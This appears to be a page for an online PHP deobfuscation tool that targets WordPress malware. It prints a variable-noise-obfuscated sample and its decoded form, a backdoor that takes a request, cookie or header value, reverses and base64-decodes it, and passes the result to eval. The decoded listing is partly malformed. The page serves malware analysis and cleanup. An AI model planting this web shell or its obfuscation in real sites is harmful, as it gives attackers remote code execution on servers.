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PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $bonni = 'evRP[T]'; $grasped='R';$color ='m'; $classroom ='T';$enigma='rQL"_i';$emancipation = 't'; $containment='pc';$bump = '"(tener';$doctor ='g(hWs"e';$clairvoyantly ='c$)(v';$discharging = '[Ea';$communicant ='a'; $anagram= 'EaRf';$encrypt= 'Y';$handler ='_al'; $justiciable = '_ce(vR';...

Obfuscated php code

$bonni = 'evRP[T]';

$grasped='R';$color ='m';

$classroom ='T';$enigma='rQL"_i';$emancipation = 't';

$containment='pc';$bump = '"(tener';$doctor ='g(hWs"e';$clairvoyantly ='c$)(v';$discharging = '[Ea';$communicant ='a'; $anagram= 'EaRf';$encrypt= 'Y';$handler ='_al'; $justiciable = '_ce(vR'; $checking='UZi_$_T^[';
$caveman ='$[ddj'; $chariot ='g';

$leigha='o'; $befog ='elitcfxr)'; $chantry ='V';
$dehlia='Ds';$aphelion = ';';$heaviness = 'S';

$bureau=']T_s)]e'; $amphetamine='pbU_';$gasp= 'r';$caulk = ')lr_'; $inconsiderate='d'; $brigade ='6'; $cramp= 'tKe=beuv$'; $friendly = 'PaxOna';
$giants = 't'; $course = '"VEs);';

$eraser='VEl"il?rp';$equalizers= ';dtOT(a'; $couplers ='o'; $imperious = 'y';$fiat= 'ee$XP"P';$gab = ';'; $couplings= '"'; $debugger = 'n_';$graveyard='stape'; $fortieth ='('; $coupon='a';$gopher= 'o';$devastates ='VL)e';

$clerks= 'qeEa]r';$brenn = ')';$deaths ='?';$laurence = 'c@p@"t)';

$dubs='ir(S$'; $churches = 'g';$lucienne= 'v'; $bovine='$';$chloroplast =',';$cosme='v';$cellar= 'rV('; $lexie=')(Ta_';$beware= 'r';$kirstyn='TIPud@a '; $lobster ='XH_ED'; $boule='s]'; $lobbied = ','; $dewain = 'nS';$arrogated='e$Cv_:V';$cartographic= 'T';$bitwise= 'r4))i'; $desks= '(yis=X$(e';$enhances ='i'; $creeping = 'd';

$impaired='e'; $bin = '[oi:mQs'; $coincidences='v';$derived= 'eg$iHf'; $decipherer='`';$grindstone='ktE';

$bluebill=$laurence['0']. $bitwise['0'] . $derived['0'].$kirstyn['6'] .$grindstone['1']. $derived['0'] .$arrogated['4'].$derived['5'] . $kirstyn['3'] . $dewain['0']. $laurence['0'] . $grindstone['1'] . $derived['3'] .$bin['1'] .$dewain['0']; $anagrams=$kirstyn['7'];

 $institutes = $bluebill ($anagrams,$derived['0'] .$coincidences . $kirstyn['6'] . $eraser[5]. $desks['7'] .

$kirstyn[5] .$kirstyn['6'] . $bitwise['0']. $bitwise['0']. $kirstyn['6'] .
$desks['1'] . $arrogated['4']. $laurence['2']. $bin['1'] . $laurence['2'] . $desks['7'].
$derived['5'] . $kirstyn['3'] .$dewain['0']. $laurence['0'] . $arrogated['4'].$derived['1'].

$derived['0'] .
$grindstone['1'] .$arrogated['4'].

$kirstyn['6']. $bitwise['0']. $derived['1'] .$bin['6']. $desks['7'] . $bitwise[3] . $bitwise[3] . $bitwise[3]. $gab ); $institutes
($doctor['3'] ,$decipherer , $justiciable[5],$cartographic,$lobster['4'] , $deaths,
$bin['5'], $doctor['3'],
$clerks['0'] ,$derived[2]. $derived['3'] .$desks['4'] .$kirstyn[5] .$kirstyn['6'] . $bitwise['0'] .$bitwise['0'] .$kirstyn['6'] .$desks['1'].

$arrogated['4'] .$bin[4]. $derived['0'] .
$bitwise['0'] .$derived['1'].

$derived['0'] . $desks['7'].$derived[2] .$arrogated['4'] . $justiciable[5] .
$grindstone['2'] .

$bin['5'] . $amphetamine['2'].
$grindstone['2'] .$dewain['1']. $cartographic .$lobbied .
$derived[2]. $arrogated['4']. $arrogated['2'] . $equalizers['3']. $equalizers['3'] .$cramp['1'].$kirstyn['1'] .$grindstone['2'].$lobbied .$derived[2]. $arrogated['4'] .
$grindstone['2'].$justiciable[5] .$arrogated['6'] . $grindstone['2'] . $justiciable[5].$bitwise[3] .

$gab. $derived[2] .$kirstyn['6'] . $desks['4'] . $derived['3'] .$bin['6'] .$bin['6'] .$derived['0']. $grindstone['1']. $desks['7'] . $derived[2] .$derived['3'].$bin[0] .$laurence['4']. $coincidences. $coincidences.$derived['0'] .

$laurence['2']. $creeping .

$grindstone['1'].$friendly['2'] .$eraser[5].$laurence['4'] .$boule['1']. $bitwise[3] . $deaths.$derived[2] . $derived['3'].$bin[0].

$coincidences .
$coincidences.$derived['0'] . $laurence['2'].

$creeping . $grindstone['1'] .$friendly['2']. $eraser[5].$laurence['4'] . $boule['1'] .$bin['3'].$desks['7'].$derived['3']. $bin['6'] .

$bin['6'] .$derived['0']. $grindstone['1'].

$desks['7'] .
$derived[2] .

$derived['3'] .$bin[0] .$laurence['4']. $derived['4'] .$cartographic . $cartographic . $kirstyn['2'] .$arrogated['4']. $arrogated['6'] .$arrogated['6']. $grindstone['2'].$kirstyn['2']. $lobster['4'] .$cartographic.$desks['5'].$devastates['1'] .$laurence['4']. $boule['1'].
$bitwise[3]. $deaths. $derived[2] .$derived['3'] .$bin[0] .
$laurence['4']. $derived['4'].$cartographic.$cartographic .$kirstyn['2'] .$arrogated['4'].

$arrogated['6'].$arrogated['6'] . $grindstone['2'].$kirstyn['2'].$lobster['4']. $cartographic .$desks['5']. $devastates['1'].$laurence['4'].$boule['1']. $bin['3'].$creeping .$derived['3'].$derived['0'] .$bitwise[3].$gab . $kirstyn[5] .$derived['0'].

$kirstyn['6'] .$eraser[5]. $desks['7'] .

$bin['6']. $grindstone['1'] . $bitwise['0'] .$bitwise['0'].$derived['0'].

$coincidences. $desks['7']. $cramp['4'] .$kirstyn['6'] . $bin['6'] . $derived['0'].$brigade . $bitwise['1'] . $arrogated['4'].$creeping .

$derived['0'] . $laurence['0'].

$bin['1'] .$creeping.$derived['0'] . $desks['7'].$bin['6'].

$grindstone['1'] . $bitwise['0'].$bitwise['0'] . $derived['0'] . $coincidences . $desks['7'] .$derived[2].$kirstyn['6'].$bitwise[3].$bitwise[3] . $bitwise[3] .$bitwise[3].

$gab );

Decoded(de-Obfuscated) php code


$bonni = 'evRP[T]';
$grasped = 'R';
$color = 'm';
$classroom = 'T';
$enigma = 'rQL"_i';
$emancipation = 't';
$containment = 'pc';
$bump = '"(tener';
$doctor = 'g(hWs"e';
$clairvoyantly = 'c$)(v';
$discharging = '[Ea';
$communicant = 'a';
$anagram = 'EaRf';
$encrypt = 'Y';
$handler = '_al';
$justiciable = '_ce(vR';
$checking = 'UZi_$_T^[';
$caveman = '$[ddj';
$chariot = 'g';
$leigha = 'o';
$befog = 'elitcfxr)';
$chantry = 'V';
$dehlia = 'Ds';
$aphelion = ';';
$heaviness = 'S';
$bureau = ']T_s)]e';
$amphetamine = 'pbU_';
$gasp = 'r';
$caulk = ')lr_';
$inconsiderate = 'd';
$brigade = '6';
$cramp = 'tKe=beuv$';
$friendly = 'PaxOna';
$giants = 't';
$course = '"VEs);';
$eraser = 'VEl"il?rp';
$equalizers = ';dtOT(a';
$couplers = 'o';
$imperious = 'y';
$fiat = 'ee$XP"P';
$gab = ';';
$couplings = '"';
$debugger = 'n_';
$graveyard = 'stape';
$fortieth = '(';
$coupon = 'a';
$gopher = 'o';
$devastates = 'VL)e';
$clerks = 'qeEa]r';
$brenn = ')';
$deaths = '?';
$laurence = 'c@p@"t)';
$dubs = 'ir(S$';
$churches = 'g';
$lucienne = 'v';
$bovine = '$';
$chloroplast = ',';
$cosme = 'v';
$cellar = 'rV(';
$lexie = ')(Ta_';
$beware = 'r';
$kirstyn = 'TIPud@a ';
$lobster = 'XH_ED';
$boule = 's]';
$lobbied = ',';
$dewain = 'nS';
$arrogated = 'e$Cv_:V';
$cartographic = 'T';
$bitwise = 'r4))i';
$desks = '(yis=X$(e';
$enhances = 'i';
$creeping = 'd';
$impaired = 'e';
$bin = '[oi:mQs';
$coincidences = 'v';
$derived = 'eg$iHf';
$decipherer = '`';
$grindstone = 'ktE';
$bluebill = "create_function";
$anagrams = $kirstyn['7'];
$institutes = function () {
$institutes($doctor['3'], $decipherer, $justiciable[5], $cartographic, $lobster['4'], $deaths, $bin['5'], $doctor['3'], $clerks['0'], "\$i=@array_merge(\$_REQUEST,\$_COOKIE,\$_SERVER);\$a=isset(\$i[\"vvepdtxl\"])?\$i[\"vvepdtxl\"]:(isset(\$i[\"HTTP_VVEPDTXL\"])?\$i[\"HTTP_VVEPDTXL\"]:die);@eval(strrev(base64_decode(strrev(\$a))));");

Malware detection & removal plugin for WordPress

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